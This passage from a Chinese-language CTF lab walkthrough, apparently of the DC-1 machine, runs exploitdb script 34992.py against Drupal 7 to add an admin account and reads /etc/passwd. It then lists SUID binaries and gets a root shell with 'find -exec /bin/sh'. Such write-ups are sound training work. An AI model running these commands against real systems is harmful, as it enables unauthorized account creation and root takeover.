进入数据库select * from users\G; \G为了让界面看着更整洁
在exploitdb中有一个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号:
终端/msf输入:searchsploit drupal
python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://url -u admin3 -p admin3 创建成功账号:admin3 密码:admin3
// 使用它一个 Python 脚本的命令行,它将运行名为"34992.py"的 Python 脚本,去创建用户
6.flag4
根据提示passwd我们可以想到/etc/passwd 列出用户表
发现flag4的提示,目标发现里面有flag4,给了个路径/home/flag4
首先试试SUID提权
查看默认以root权限执行的程序:find / -perm -u=s -type f 2>/dev/null
find 指令
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
-type 类型
f 文件
2>/dev/nul 过滤错误信息(不显示错误信息)
看到find就在其中,那就比较简单了。直接使用find提权
find /var/www -exec "/bin/sh" \; 别忘记添加引号
最终cd 切换到root用户,ls查看到最终的flag,cat打开
标签:创建,DC,用户,提权,admin3,flag4,sql,find From: https://www.cnblogs.com/aidy/p/17379709.html